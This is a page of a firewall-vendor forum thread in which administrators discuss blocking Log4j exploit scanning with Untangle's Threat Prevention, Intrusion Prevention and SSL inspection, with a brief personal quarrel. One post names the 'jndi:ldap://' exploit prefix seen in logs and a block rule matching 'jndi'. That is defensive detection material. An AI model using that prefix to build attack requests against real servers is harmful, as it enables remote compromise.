Page 5 of 7 FirstFirst ... 34567 LastLast
Results 41 to 50 of 63
  1. #41
    Untanglit
    Join Date
    Dec 2020
    Posts
    23

    Default

    This is what my nessus scan of ngfw looks like, no CVE-2021-44228, but.....

    Nessus Scan.png
    dashpuppy likes this.

  2. #42
    Untangle Ninja
    WebFooL's Avatar
    Join Date
    Jan 2009
    Location
    Sweden (Eskilstuna)
    Posts
    5,049

    Default

    Quote Originally Posted by dashpuppy View Post
    You use Tp ? Every time i enable that software on my Untangle units "$hit hits the fan. ALOT of things break and stop working ! As advice from a member on here, was to Disable it and move on with life and don't use it.. Maybe i just need to learn it more and figure out how to enable things and make ALOT of exceptions... :O
    We had issues with it in the beginning and a few tickets every month when some cloud platform gets there ip in the high risk category.

    But in hole it do more good then damage at the moment.

  3. #43
    Master Untangler
    Join Date
    Jul 2010
    Location
    Nanaimo B.C
    Posts
    874

    Default

    Quote Originally Posted by WebFooL View Post
    We had issues with it in the beginning and a few tickets every month when some cloud platform gets there ip in the high risk category.

    But in hole it do more good then damage at the moment.
    I just have to make alot of exceptions is all ! Like youtube ? Or my Aruba Portal was blocked.. etc etc..
    Started Youtube Channel, Have a question about Untangle Ask me : jason @ jasonslab.ca
    https://www.youtube.com/c/jasonslabvideos << Please like and subscribe, helps me out !!

  4. #44
    Untangle Ninja sky-knight's Avatar
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,510

    Default

    Nope, just let it ride and make the exceptions you need. It's really handy for protecting web servers because it filters out a bucket of log4j scanning right now.

    Which is a ton more useful than an intrusion prevention module that cannot see the URI string to do anything!
    junglechuck likes this.
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com

  5. #45
    Master Untangler
    Join Date
    Jul 2010
    Location
    Nanaimo B.C
    Posts
    874

    Default

    Quote Originally Posted by sky-knight View Post
    Nope, just let it ride and make the exceptions you need. It's really handy for protecting web servers because it filters out a bucket of log4j scanning right now.

    Which is a ton more useful than an intrusion prevention module that cannot see the URI string to do anything!
    Id ask you to share an example / screen shot but, you would probably submit another @hole response like the one in the direct PM.
    Started Youtube Channel, Have a question about Untangle Ask me : jason @ jasonslab.ca
    https://www.youtube.com/c/jasonslabvideos << Please like and subscribe, helps me out !!

  6. #46
    Untangle Ninja sky-knight's Avatar
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,510

    Default

    Quote Originally Posted by dashpuppy View Post
    Id ask you to share an example / screen shot but, you would probably submit another @hole response like the one in the direct PM.
    Was that before or after you spammed me twice with a request that I go into more detail about which I was quite clear once already?

    Oh... and for FREE I might add. I have kids to feed, I get PAID for professional tech support.

    You were quite rude, I responded bluntly but appropriately. And now you come here to air dirty laundry in public? How classy!

    Seriously, and all over a 1 line rule?

    It seems to me that you want to use my knowledge and experience for your own gain, but only when I give it away in tiny personalized bite sized pieces for free. You want more for free, go read the wiki. It has all you need to answer both questions, in less than 1 paragraph.
    Last edited by sky-knight; 12-17-2021 at 01:40 PM.
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com

  7. #47
    Untangler jcoffin's Avatar
    Join Date
    Aug 2008
    Location
    Lake Tahoe
    Posts
    9,710

    Default

    Be nice folks. It's the holidays for goodwill to all people.
    hpaunet and dashpuppy like this.
    Attention: Support and help on the Untangle Forums is provided by
    volunteers and community members like yourself.
    If you need Untangle support please call or email support@untangle.com

  8. #48
    Untangler
    Join Date
    May 2016
    Posts
    51

    Default

    Quote Originally Posted by sky-knight View Post
    Nope, just let it ride and make the exceptions you need. It's really handy for protecting web servers because it filters out a bucket of log4j scanning right now.

    Which is a ton more useful than an intrusion prevention module that cannot see the URI string to do anything!
    I must be doing something wrong. I have Intrusion Prevention set to block the 46 signatures that contain log4j, yet I see nothing getting blocked. When I look at my modsecurity logs I still see a lot of the jndi:ldap:// type of requests. It's like it's skipping right past Intrusion Prevention.

    EDIT: Ok, realized it's Threat Prevention people are speaking of, but still can't get it. For example, I did a rule to block URI is jndi. However, that went right through on a test.
    Last edited by sspeed; 12-17-2021 at 02:59 PM.
    dashpuppy likes this.

  9. #49
    Untangle Ninja sky-knight's Avatar
    Join Date
    Apr 2008
    Location
    Phoenix, AZ
    Posts
    26,510

    Default

    Quote Originally Posted by sspeed View Post
    I must be doing something wrong. I have Intrusion Prevention set to block the 46 signatures that contain log4j, yet I see nothing getting blocked. When I look at my modsecurity logs I still see a lot of the jndi:ldap:// type of requests. It's like it's skipping right past Intrusion Prevention.

    EDIT: Ok, realized it's Threat Prevention people are speaking of, but still can't get it. For example, I did a rule to block URI is jndi. However, that went right through on a test.
    No, you have Intrusion Prevention configured correctly if you have those rules set to block. The problem is the module will never see the URI field because all the traffic is encrypted. You have to use SSL inspector to terminate the SSL inbound on Untangle, and then forward on the traffic to the web server. This reality is a bit cumbersome to deal with on NGFW, which is why Untangle has a new Web Application Firewall product.

    That being said, I recommend use of Policy Manager to direct all ingress web traffic on NGFW to its own policy, from there you can install a curated list of modules. Threat Prevention in this policy is a risk... you WILL have to keep a close eye on it. However, if you deploy Threat Prevention in such a way that it's responsible for ingress web traffic, it will control traffic based on the reputations of the IPs in question. The addresses that are abusing our web servers with these exploit attempts are largely crap, so Threat Prevention behaves accordingly. This in turns cleans up your web access logs.

    I'm using it on my public website, as well as my RMM currently. It's not great at times because the locations my agents are checking in from often also have terrible reputations. For these locations I use IP address in a policy rule to push the traffic to yet another policy that doesn't have Threat Prevention. Basically I have a single policy rule that has a growing list of IP addresses in it. Occasionally I just delete them all and start over.

    P.S. If you decide to use Threat Prevention on your own web content, there's a check box under it's advanced tab you're going to want to enable.
    Last edited by sky-knight; 12-17-2021 at 03:21 PM.
    dashpuppy likes this.
    Rob Sandling, BS:SWE, MCP
    NexgenAppliances.com
    Phone: 866-794-8879 x201
    Email: support@nexgenappliances.com

  10. #50
    Untanglit
    Join Date
    May 2020
    Location
    Canada
    Posts
    15

    Default

    Quote Originally Posted by dashpuppy View Post
    Id ask you to share an example / screen shot...
    I think this is the way: at 28:40 change the rule to Log4j
    https://www.youtube.com/watch?v=o36ep-u-Ayo
    dashpuppy likes this.

Page 5 of 7 FirstFirst ... 34567 LastLast

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

SEO by vBSEO 3.6.0 PL2